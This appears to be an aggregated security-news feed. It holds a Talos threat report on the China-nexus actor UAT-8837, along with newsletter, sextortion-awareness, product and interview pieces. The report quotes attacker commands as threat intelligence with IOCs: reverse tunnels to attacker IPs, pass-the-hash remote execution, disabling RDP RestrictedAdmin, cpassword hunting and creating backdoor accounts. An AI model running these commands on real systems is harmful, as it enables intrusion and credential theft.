Predicting 2026

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Predicting 2026

Welcome to this week’s edition of the Threat Source newsletter. 

It’s become traditional at this time of year to make predictions about cybersecurity for the coming year. Obviously, no one has a crystal ball to predict the future, and if they did, they would be quietly making a fortune rather than sharing their insights in a newsletter. Any predictions about what lies ahead in the coming year should be taken with a generous pinch of salt. 

However, the exercise isn’t futile. Taking time to pause and reflect on the current threat landscape, the forces driving change, and how our own exposure is evolving can help us form reasonable guesses about what might happen during the forthcoming year. 

We’re living in a very tense geopolitical environment. We should expect continued use of infostealer malware and phishing campaigns as adversaries seek to map supply chains, and understand how organisations and governments may react to escalating aggression. As part of this activity, we’ll continue to see proxy actors conducting destructive attacks and financing their activities through extorting payment. Less sophisticated groups may also engage in website defacements or deploy disruptive malware in pursuit of political visibility or ideological goals. 

Suffice to say that we are living in tense and difficult times. In a globally connected world, no one is isolated from the effects of conflict, no matter how distant it may seem. 

At the same time, our use of technology continues to evolve, reshaping our threat exposure. Many organizations have already enthusiastically embraced generative AI. As AI systems are given more autonomy and broader access to internal systems, we can imagine that we will see breaches caused by poorly constrained or insufficiently governed AI agents. 

Many accidental or malicious insider attacks are caused by individuals having excessive permissions or unfettered access to data with little oversight. We can imagine AI agents provoking similar incidents, whether through flawed design, unintended behavior, or deliberate prompt manipulation by an attacker. 

While it is important to consider these newer and more exotic threats, we should not lose sight of the familiar ones. Unpatched systems, leaked credentials, accounts lacking multi-factor authentication, and poor network visibility continue to underpin many successful attacks. 

One thing is certain: Cybersecurity teams will remain busy throughout 2026.  There will be threat actors attempting to compromise our systems, there will be new techniques that they will use, but there will be many more attacks using techniques that we have seen before. 

It’s going to be a demanding year. Wishing good fortune and happy threat hunting to everyone.

The one big thing 

Cisco Talos is monitoring UAT-8837, which we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor. They have been actively targeting critical infrastructure organizations in North America since at least 2025. They typically gain access by exploiting vulnerabilities or using stolen credentials, then use a mix of open-source tools to steal sensitive data and create multiple ways back into the network. UAT-8837 adapts quickly, constantly changing up their tools to evade detection. 

Why do I care? 

This group is focused on high-value targets and uses advanced, constantly evolving techniques that can bypass traditional defenses — even leveraging zero-day vulnerabilities. Their actions can lead to stolen credentials, persistent access, and potentially large-scale supply chain or infrastructure disruptions. 

So now what? 

Stay vigilant by keeping systems patched, monitoring for the specific tools and behaviors outlined in the report, and using up-to-date detection rules from sources like Talos. Proactively hunting for these IOCs and unusual user/account activity, combined with strong credential and privilege management, will be crucial to reducing risk from UAT-8837.

Top security headlines of the week 

BreachForums breached, exposing 324K cybercriminals 
In an ironic development, an individual using the moniker “James” published a database containing detailed information of hundreds of thousands of BreachForum users who believed they were operatinganonymously. (DarkReading

Target’s dev server offline after hackers claim to steal source code 
An unknown threat actor has claimed to have stolen a trove of Target’s internal source code and documentation and is selling it on dark web marketplaces. Multiple Target employees have now confirmed the authenticity of leaked source code sample set. (BleepingComputer

Predator spyware turns failed attacks into intelligence for future exploits 
New research reveals previously undocumented mechanisms that return information to developers on failed individual attacks. This means Predator can learn from its own failures so that future versions may be hardened against detection and analysis. (SecurityWeek

Instagram fixes password reset vulnerability amid user data leak 
Social media giant Meta confirmed an Instagram password reset vulnerability but denied being breached. Meta said the resolved vulnerability allowed third parties to send password reset requests to Instagram users. (SecurityWeek

Everest Ransomware claims breach at Nissan, says 900GB of data stolen
While no sensitive personal data is shown in the screenshots themselves, the folder names and file types imply access to operational systems and documents that could be used to map internal processes or extract more sensitive information. (Hack Read

Can’t get enough Talos? 

Talos Takes: Cyber certifications and you 
In the first episode of the year, Amy Ciminnisi, Talos’ Content Manager and new podcast host, steps up to the mic with Joe Marshall to explore certifications, one of cybersecurity’s overwhelming (and sometimes most controversial) topics. 

Humans of Talos: Brushstrokes and breaches with Terryn Valikodath 
Join us as Terryn shares what keeps him motivated during high-pressure incidents, the satisfaction he finds in teaching others during Cyber Range trainings, and the creative outlets that help him recharge. 

Microsoft Patch Tuesday for January 2026 
Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical.”

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59  
Example Filename: APQCE0B.dll  
Detection Name: Auto.90B145.282358.in02 

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_3_Exe.exe  
Detection Name: Win.Dropper.Miner::95.sbx.tg 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe  
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
MD5: 85bbddc502f7b10871621fd460243fbc  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
Example Filename: 85bbddc502f7b10871621fd460243fbc.exe  
Detection Name: W32.41F14D86BC-100.SBX.TG 

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
MD5: 71fea034b422e4a17ebb06022532fdde  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
Example Filename: VID001.exe  
Detection Name: Coinminer:MBT.26mw.in14.Talos 

Cisco Talos Blog – ​Read More

AI-powered sextortion: a new threat to privacy | Kaspersky official blog

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In 2025, cybersecurity researchers discovered several open databases belonging to various AI image-generation tools. This fact alone makes you wonder just how much AI startups care about the privacy and security of their users’ data. But the nature of the content in these databases is far more alarming.

A large number of generated pictures in these databases were images of women in lingerie or fully nude. Some were clearly created from children’s photos, or intended to make adult women appear younger (and undressed). Finally, the most disturbing part: some pornographic images were generated from completely innocent photos of real people — likely taken from social media.

In this post, we’re talking about what sextortion is, and why AI tools mean anyone can become a victim. We detail the contents of these open databases, and give you advice on how to avoid becoming a victim of AI-era sextortion.

What is sextortion?

Online sexual extortion has become so common it’s earned its own global name: sextortion (a portmanteau of sex and extortion). We’ve already detailed its various types in our post, Fifty shades of sextortion. To recap, this form of blackmail involves threatening to publish intimate images or videos to coerce the victim into taking certain actions, or to extort money from them.

Previously, victims of sextortion were typically adult industry workers, or individuals who’d shared intimate content with an untrustworthy person.

However, the rapid advancement of artificial intelligence, particularly text-to-image technology, has fundamentally changed the game. Now, literally anyone who’s posted their most innocent photos publicly can become a victim of sextortion. This is because generative AI makes it possible to quickly, easily, and convincingly undress people in any digital image, or add a generated nude body to someone’s head in a matter of seconds.

Of course, this kind of fakery was possible before AI, but it required long hours of meticulous Photoshop work. Now, all you need is to describe the desired result in words.

To make matters worse, many generative AI services don’t bother much with protecting the content they’ve been used to create. As mentioned earlier, last year saw researchers discover at least three publicly accessible databases belonging to these services. This means the generated nudes within them were available not just to the user who’d created them, but to anyone on the internet.

How the AI image database leak was discovered

In October 2025, cybersecurity researcher Jeremiah Fowler uncovered an open database containing over a million AI-generated images and videos. According to the researcher, the overwhelming majority of this content was pornographic in nature. The database wasn’t encrypted or password-protected — meaning any internet user could access it.

The database’s name and watermarks on some images led Fowler to believe its source was the U.S.-based company SocialBook, which offers services for influencers and digital marketing services. The company’s website also provides access to tools for generating images and content using AI.

However, further analysis revealed that SocialBook itself wasn’t directly generating this content. Links within the service’s interface led to third-party products — the AI services MagicEdit and DreamPal — which were the tools used to create the images. These tools allowed users to generate pictures from text descriptions, edit uploaded photos, and perform various visual manipulations, including creating explicit content and face-swapping.

The leak was linked to these specific tools, and the database contained the product of their work, including AI-generated and AI-edited images. A portion of the images led the researcher to suspect they’d been uploaded to the AI as references for creating provocative imagery.

Fowler states that roughly 10,000 photos were being added to the database every single day. SocialBook denies any connection to the database. After the researcher informed the company of the leak, several pages on the SocialBook website that had previously mentioned MagicEdit and DreamPal became inaccessible and began returning errors.

Which services were the source of the leak?

Both services — MagicEdit and DreamPal — were initially marketed as tools for interactive, user-driven visual experimentation with images and art characters. Unfortunately, a significant portion of these capabilities were directly linked to creating sexualized content.

For example, MagicEdit offered a tool for AI-powered virtual clothing changes, as well as a set of styles that made images of women more revealing after processing — such as replacing everyday clothes with swimwear or lingerie. Its promotional materials promised to turn an ordinary look into a sexy one in seconds.

DreamPal, for its part, was initially positioned as an AI-powered role-playing chat, and was even more explicit about its adult-oriented positioning. The site offered to create an ideal AI girlfriend, with certain pages directly referencing erotic content. The FAQ also noted that filters for explicit content in chats were disabled so as not to limit users’ most intimate fantasies.

Both services have suspended operations. At the time of writing, the DreamPal website returned an error, while MagicEdit seemed available again. Their apps were removed from both the App Store and Google Play.

Jeremiah Fowler says earlier in 2025, he discovered two more open databases containing AI-generated images. One belonged to the South Korean site GenNomis, and contained 95,000 entries — a substantial portion of which being images of “undressed” people. Among other things, the database included images with child versions of celebrities: American singers Ariana Grande and Beyoncé, and reality TV star Kim Kardashian.

How to avoid becoming a victim

In light of incidents like these, it’s clear that the risks associated with sextortion are no longer confined to private messaging or the exchange of intimate content. In the era of generative AI, even ordinary photos, when posted publicly, can be used to create compromising content.

This problem is especially relevant for women, but men shouldn’t get too comfortable either: the popular blackmail scheme of “I hacked your computer and used the webcam to make videos of you browsing adult sites” could reach a whole new level of persuasion thanks to AI tools for generating photos and videos.

Therefore, protecting your privacy on social media and controlling what data about you is publicly available become key measures for safeguarding both your reputation and peace of mind. To prevent your photos from being used to create questionable AI-generated content, we recommend making all your social media profiles as private as possible — after all, they could be the source of images for AI-generated nudes.

We’ve already published multiple detailed guides on how to reduce your digital footprint online or even remove your data from the internet, how to stop data brokers from compiling dossiers on you, and protect yourself from intimate image abuse.

Additionally, we have a dedicated service, Privacy Checker — perfect for anyone who wants a quick but systematic approach to privacy settings everywhere possible. It compiles step-by-step guides for securing accounts on social media and online services across all major platforms.

And to ensure the safety and privacy of your child’s data, Kaspersky Safe Kids can help: it allows parents to monitor which social media their child spends time on. From there, you can help them adjust privacy settings on their accounts so their posted photos aren’t used to create inappropriate content. Explore our guide to children’s online safety together, and if your child dreams of becoming a popular blogger, discuss our step-by-step cybersecurity guide for wannabe bloggers with them.

Kaspersky official blog – ​Read More

UAT-8837 targets critical infrastructure sectors in North America

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  • Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on overlaps in tactics, techniques, and procedures (TTPs) with those of other known China-nexus threat actors.
  • Based on UAT-8837’s TTPs and post-compromise activity Talos has observed across multiple intrusions, we assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.
  • Although UAT-8837’s targeting may appear sporadic, since at least 2025, the group has clearly focused on targets within critical Infrastructure sectors in North America.

UAT-8837 targets critical infrastructure sectors in North America

After obtaining initial access — either by successful exploitation of vulnerable servers or by using compromised credentials — UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as credentials, security configurations, and domain and Active Directory (AD) information to create multiple channels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy. The TTPs, tooling, and remote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a ViewState Deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access to zero-day exploits.

Post-compromise actions

UAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. Most recently, UAT-8837 exploited a ViewState Deserialization zero-day vulnerability in SiteCore products, CVE-2025-53690, to obtain initial access.

After UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following commands:

ping google[.]com
tasklist /svc
netstat -aon -p TCP
whoami
quser
hostname
net user

The threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting into other devices:

REG ADD HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

A shell console may subsequently be opened via “cmd.exe” to conduct hands-on keyboard activity on the compromised endpoint. Multiple artifacts are then downloaded to the following directories which were extensively used for staging artifacts:

C:Users<user>Desktop
C:windowstemp
C:windowspublicmusic

UAT-8837 tool usage

UAT-8837 may use a variety of tooling throughout the course of an intrusion. This variation in tooling may be because many of these tools are detected and blocked by most security products such as Cisco Secure Endpoint (CSE) which often leads the threat actor to cycle through different variants of the tools to find versions that are not detected.

GoTokenTheft

The GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:Users<user>Desktopgo.exe, it may be used to steal tokens to run commands with elevated privileges:

eee.ico REG ADD HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

Earthworm

Earthworm is network tunneling tool that has extensively been used by Chinese-speaking threat actors in intrusions to expose internal endpoints to attacker-owned remote infrastructure. UAT-8837 deploys multiple versions of Earthworm to determine which are not detectable by endpoint protection products. The undetected version is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:

C:WindowsTempv.ico -s rssocks -d 172[.]188[.]162[.]183 -e 1433
  
C:userspublicvideosverr.ico -s rssocks -d 172.188.162.183 -e 443
  
C:WindowsTempeir.ico  -p 8888 -t 172[.]188[.]162[.]183 -f 11112
  
cisos.ico -s rssocks -d 172[.]188[.]162[.]183 –e80
  
vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443
  
vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 447
  
abc.ico -s rssocks -d 4[.]144[.]1[.]47 -e 448
  
C:userspublicmusicaa.exe -s rssocks -d 74[.]176[.]166[.]174 -e 443
  
C:UserspublicMusictwd.exe -s rssocks -d 20[.]200[.]129[.]75 -e 443

DWAgent

UAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint and drop additional malware to the system:

C:Users\Downloadsdwagent.exe
 
C:Users\AppDataLocalTempdwagent20250909101732runtimedwagent.exe -S -m installer

SharpHound

Per Talos’ observations, UAT-8837 downloads SharpHound with the intention to collect Active Directory information:

C:WindowsTempSharpHound.exe

Impacket

UAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:

C:WindowsTempwec.ico

When Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated privileges:

C:WindowsTempInvoke-WMIExec.ps1

GoExec

In one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote execution tool to execute commands on other connected remote endpoints within the victim’s network:

goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <u>/<p> -H <hash> -e 'cmd.exe' -a '/C hostname /all' -o-
 
C:WindowsTempgoe.exe wmi proc 10[.]xx[.]xx[.]xx 
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <u>/<p> --nt-hash <hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> --nt-hash <hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> --nt-hash 00000000000000000000000000000000:<hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico dcom mmc 10[.]xx[.]xx[.]xx -u <user> --nt-hash 00000000000000000000000000000000:<hash> -e cmd.exe -a /C hostname -o 1.txt
 
goe.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> -p <password> -e cmd.exe -a /C hostname -o 1.txt
 
g.ico dcom mmc 10[.]xx[.]xx[.]xx -u <user> -p <password> -e cmd.exe -a /C ipconfig -o-
g.ico wmi proc 10[.]xx[.]xx[.]xx -u <user> -p <password> -e cmd.exe -a /C hostname -o-

It is worth noting here that the usage of GoExec was likely an on-the-fly decision by the operator, necessitated by the constant detection and blocking of the threat actors tooling by CSE.

The threat actor also attempted to download and execute SharpWMI in the compromised environment, which was again detected by CSE:

C:WindowsTemps.ico

Rubeus

Rubeus, a C# based toolset for Kerberos abuse may also be deployed:

  • C:WindowsTempr.ico
  • C:WindowsTemplo.txt

Certipy

UAT-8837 also deploys Certipy, a tool for AD discovery and abuse, to:

C:WindowsTempCertipy.exe

Hands-on-keyboard activity

UAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials from victim organizations:

findstr /S /l cpassword [\]policies*.xml

 The system’s security configuration is also exported using secedit:

secedit /export /cfg C:windowstemppol.txt

 Windows Local security policies extracted via secedit include password policies, user rights and audit settings. This information may be valuable to adversaries who seek to evaluate an endpoint’s security posture including network security settings.

In one victim organization, UAT-8837 exfiltrated DLL-based shared libraries related to the victim’s products, raising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply chain compromises and reverse engineering to find vulnerabilities in those products.

Domain reconnaissance

The net commands typically used to query domain groups and users are:

net group domain admins /domain

net localgroup administrators /domain

net group <name> /domain
 
net user <user> <password> /domain

net user <user> /domain

net accounts /domain

net user <user> /domain
 
nltest /DCLIST:<domain>

nslookup <subdomina>.<domain>

 The setspn command is used to list and query Service Principal Names (SPN) data from Active Directory:

setspn -L 

setspn -Q */*

Active Directory reconnaissance

UAT-8837 deploys a combination of tools to perform AD reconnaissance in the compromised environment. These tools include SharpHound and Certipy. The threat actor also uses the Windows-native tool “setspn” to query for AD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. In one intrusion, the actor deployed dsget and dsquery to query for specific properties in the AD:

dsquery.exe user -limit 0 
  
dsquery.exe user -name <name>
  
dsget user -samid -display -email -upn
  
dsget.exe user -samid -display -email -upn
  
dsquery.exe user -samid <id> 
  
dsget.exe user -display -email -upn
  
dsquery.exe user -name admin
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com -samid -display -email -upn
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com -upn
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com –memberof
  
dsget.exe user CN=<id>,OU=ServiceAccounts,OU=Production,DC=prod,DC=<domain>,DC=com –disabled
  
dsquery * DC=prod,DC=<domain>,DC=com -filter (objectClass=user) -attr * -limit 0

Backdoored user accounts

The threat actor created user accounts to open up another channel of access to the compromised environment:

net user <user> <password> /add /domain

In another instance, UAT-8837 added an existing user account to local groups:

net user <user>
  
net localgroup <group> <user> /add

Coverage

The following ClamAV signature detects and blocks this threat:

  • Win.Malware.Earthworm

The following Snort Rules (SIDs) detect and block this threat:

  • Snort 2 – 61883, 61884, 63727, 63728
  • Snort 3 – 300585, 63727, 63728

Indicators of compromise (IOCs)

The IOCs for this threat are also available at our GitHub repository here.

1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa – GoTokenTheft
451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd - Earthworm
B3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b – Earthworm
Fab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6 – Earthworm
4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883 - Earthworm
 
891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795 - GoTokenTheft
5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796 – SharpHound
6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0 – Impacket
887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744 – GoExec
4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c - GoExec
1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183 – SharpWMI
51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487 – Rubeus
2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59 – Rubeus
E27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d – Certipy
 
B7ecd4ff75c0e3ed196e1f53d92274b1e94f17fa6c39616ce0435503906e66fb
42e3ad56799fbc8223fb8400f07313559299496bb80582a6cbae29cb376d96c3
6d20371b88891a1db842d23085a0253e36cf3bf0691aee2ae15a66fc79f3803d
4e8304040055d3bffcb3551873da45f66577723d1a975416a49afa5aec4eb295
BDF7B28DF19B6B634C05882D9F1DB73F63252F855120ED3E4DA4E26F2C6190E8
1c5174672bf2ccedb6a426336ca79fd326e61cd26dd9ae684b8ffd0b5a70c700
d0beb6184ea4402c39e257d5912c7ace3607e908e76127014e3ec02866b6d70c
194ca1b09902ceaaa8a7e66234be9dc8a12572832836361f49f1074eae861794
74e68b4e07d72c9b8e0bc8cbfd57f980b4a2cd9d27c37bb097ca4fb2108706e3
Ced14e8beb20a345a0d6f90041d8517c04dbc113feff3bc6e933968d6b846e31
8bf233f608ea508cd6bf51fb23053d97aa970b8d11269d60ce5c6e113e8e787a
5391f69425217fa8394ebac0d952c5a3d1f0f5ac4f20587978cd894fdb6199cd
8bc008a621c5e3068129916770d24ee1d7d48079ee42797f86d3530ca90e305c
De9c13b1abeab11626a8edc1385df358d549a65e8cc7a69baca84cd825acc8e7
4d47445328bfd4db12227af9b57daab4228244d1325cba572588de237f7b2e98
 
74[.]176[.]166[.]174
20[.]200[.]129[.]75
172[.]188[.]162[.]183
4[.]144[.]1[.]47
103[.]235[.]46[.]102

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ANY.RUN & Tines: Scale SOC and Meet SLAs with Powerful Automation 

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In busy SOC environments, every minute spent waiting for threat validation slows containment and impacts response metrics. The ANY.RUN integration with Tines delivers trusted verdicts and enriched context in seconds to cut mean time to respond (MTTR) and keep investigations flowing without delays. 

ANY.RUN X Tines Integration: Faster Triage with Behavior-Driven Context 

The new integration lets your SOC team pull actionable verdicts and intel from Interactive Sandbox and Threat Intelligence Lookup straight into the Tines workflows you already use. Instead of jumping between different tabs to confirm behavior or collect indicators, analysts can validate alerts, prioritize critical events, and enrich incidents with behavioral intelligence without leaving the Tines interface. 

It is available to all ANY.RUN customers with API access, including Enterprise SandboxTI Lookup Premium, and trial users. You can run everything through the Tines visual interface or make direct API calls if you prefer more flexibility. 

The goal is simple: bring fast detonation results and fresh intelligence right into your workflow, so investigations keep moving without extra steps slowing you down. 

Tines story automating URL analysis with ANY.RUN 

The Difference You’ll See in Your SOC 

The integration affects several parts of the investigation workflow, improving both speed and decision quality: 

  • Reduce mean time to respond (MTTR): Automate detonation and enrichment, so analysts get verdicts and IOCs within minutes, shortening investigation cycles and resolution times across the SOC. 
  • Improve triage accuracy and cut false positives: Behavioral verification from ANY.RUN delivers ground truth for detections, helping the team focus on real threats and reduce wasted effort. 
  • Handle more incidents without adding headcount: Routine analysis and enrichment run automatically in Tines, maintaining coverage during alert spikes while freeing analysts for complex cases. 
  • Meet SLAs consistently as an MSSP: Automated sandboxing and enrichment help MSSPs deliver fast, quality services, and scale response capacity without extra integration overhead.  

Combined, these improvements shorten detection‑to‑mitigation time from hours to minutes, lower analyst workload, and boost SOC throughput

Speed up investigations inside Tines with ANY.RUN
Scale response without adding headcount



Contact us 


Interactive Malware Sandbox in Tines 

ANY.RUN’s Interactive Sandbox integration with Tines brings live, behavior‑based malware analysis into your Tines workflows. Instead of relying on static detections or manual uploads, you get real‑time verdicts, IOCs, and behavioral data in the same environment that runs your automation. 

Capabilities 

  • Submit suspicious files or URLs from any Tines story for automatic detonation and observation. 
  • Retrieve verdicts, IOCs, and full HTML reports as structured outputs. 
  • Reuse sandbox results across workflows or forward them to SIEM/EDR platforms through API actions. 
ANY.RUN sandbox verdict for a URL shown in Tines, including malicious activity detection and extracted IOCs 

Example: Suspicious email attachments can be automatically sent for sandbox analysis. The resulting verdict and IOCs flow back to Tines, which then updates your SIEM or blocks the relevant indicators. 

Benefits 

  • Faster validation: Confirm if a file or link is malicious before escalation. 
  • Consistent triage: Every sample is processed with the same standard, eliminating delays or missed steps. 
  • Actionable context: Behavioral data and network activity indicators feed directly into response actions. 

Threat Intelligence Lookup in Tines 

ANY.RUN’s Threat Intelligence Lookup integration with Tines adds context‑rich intelligence to automated processes. Each time a new IP, domain, or hash appears, you can check it against ANY.RUN’s continuously updated database of recent malware activity to enrich your decisions. 

Capabilities 

  • Automatically perform lookups for IOCs inside any Tines story. 
  • Retrieve brief overviews or full JSON data with reputation, threat family, and activity history. 
  • Combine Lookup results with internal data sources to refine correlation and playbook logic. 
TI Lookup results returned inside a Tines story, showing verdict, threat level, and IOC details 

Example: When a newly observed IOC triggers an alert, Tines can automatically query TI Lookup for reputation data and campaign context, helping analysts decide whether to escalate or suppress the event. 

Benefits 

  • Higher detection fidelity: Real‑world sandbox intelligence helps distinguish live threats from noise. 
  • Smarter prioritization: Know which IOCs are still active and which are already dormant. 
  • Efficient workflow chaining: Lookup results are ready to power next‑step actions like blocking, reporting, or case validation. 

Strengthen triage with IOC intelligence 

Retrieve fresh data from ANY.RUN for every alert



Contact us 


How You Can Get Started in Minutes 

ANY.RUN’s integration with Tines includes ready‑to‑use example stories for file analysis, URL analysis, and TI Lookup queries.  

You can install it and start testing in just a few minutes, with no complex setup or custom scripting required. 

About ANY.RUN 

ANY.RUN helps security teams understand threats faster and take action with confidence.  

The solution is trusted by over 500,000 security professionals and more than 15,000 organizations across sectors where speed and accuracy define successful response. 

ANY.RUN’s Interactive Sandbox lets teams safely run suspicious files and links, watch real behavior unfold, and confirm threats before they spread. Paired with Threat Intelligence Lookup and Threat Intelligence Feeds, it delivers the context needed to sort alerts, cut uncertainty, and stop advanced attacks earlier in the response cycle. 

Reuqest a 2-week ANY.RUN trial → 

FAQ 

What problems does the ANY.RUN × Tines integration solve? 

It removes the need to switch between tools to validate alerts. Sandbox results and TI Lookup context arrive directly inside your Tines stories, helping your team move investigations forward without stopping for manual checks. 

What does ANY.RUN return to Tines after analysis?

You get verdicts, behavior summaries, IOCs, network activity, risk scores, and optional full HTML reports; all as structured outputs that Tines can use in later steps. 

How fast do results come back?

Most verdicts return within minutes. ANY.RUN reveals the majority of malicious behavior in the first 60 seconds, so playbooks don’t stall waiting for enrichment. 

Is the integration available for trial users? 

Yes. Anyone with ANY.RUN API access, including trial users, can use the integration. 

Will sandbox detonations slow down my playbooks? 

No. Detonations run in parallel on ANY.RUN’s side, and Tines continues the story when the result is ready. Most verdicts return within minutes. 

Can I use the output to update SIEM or EDR tools? 

Yes. Tines can pass ANY.RUN results to your existing systems as part of automated response actions. 

Does the integration support high-volume alerting? 

Yes. It’s built to run reliably during spikes, so routine detonations and lookups continue without interruption. 

Can I create custom workflows with the integration? 

Absolutely. The prebuilt stories are only a starting point; you can adapt them to match your escalation rules, correlation logic, or existing playbooks. 

The post ANY.RUN & Tines: Scale SOC and Meet SLAs with Powerful Automation  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Is it time for internet services to adopt identity verification?

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Should verified identities become the standard online? Australia’s social media ban for under-16s shows why the question matters.

WeLiveSecurity – ​Read More

Brushstrokes and breaches with Terryn Valikodath

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Brushstrokes and breaches with Terryn Valikodath

Cisco Talos is kicking off the new year with a behind-the-scenes look at incident response through the eyes of Terryn Valikodath, Senior Incident Response Consultant at Talos. In this episode, Amy sits down with Terryn to explore the realities of a job that blends technical know-how with communication skills, proactive planning, and a passion for problem-solving. Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family’s tech — interests that eventually steered him toward the fast-paced world of digital investigations.

Join us as Terryn shares what keeps him motivated during high-pressure incidents, the satisfaction he finds in teaching others during cyber range trainings, and the creative outlets that help him recharge

Amy Ciminnisi: Can you tell us a little bit about what you do here in Talos?

Terryn Valikodath: Absolutely. I’m a Senior Incident Response Consultant, so essentially an incident responder. The unique thing about our team is that we handle both proactive and reactive work. On the proactive side, we help develop incident response plans, run tabletop exercises, threat hunts, training, and similar tasks. On the reactive side, we step in when an organization experiences a security event, investigate, and provide recommendations to get them back up and running. It’s rewarding to see both sides of the work.

AC: On my end, I’m always amazed at all the different services Cisco Talos Incident Response provides. Is it difficult to balance them, and is there a part of the job you enjoy most?

TV: It definitely takes some getting used to since most cybersecurity roles focus on either proactive or reactive tasks, not both. But it’s helpful, because our direct experience informs the advice we give. For example, when we develop an incident response plan, we can reference real situations we’ve handled. That builds trust with customers. My favorite aspect is running cyber range trainings — a three-day course where we teach technical folks how to handle incident response. I’m passionate about teaching, both externally and within our team. I enjoy demystifying the field and showing people that it’s about dedication and learning, not just being a specialist.

Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.

Cisco Talos Blog – ​Read More

German Manufacturing Under Phishing Attacks: Tracking a Stealthy AsyncRAT Campaign 

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Manufacturing companies have quietly become one of the most hunted species in the modern threat landscape. Not because they are careless, but because they are operationally critical, geographically distributed, and often rely on complex IT and OT environments that attackers love to probe. 

Key Takeaways 

  • Manufacturing is among the top industries targeted by ransomware groups and advanced campaigns, often with region-specific lures. 
  • Attackers continue to favor invoice-themed and supplier-related emails, carefully localized to increase trust and click-through rates in manufacturing environments. 
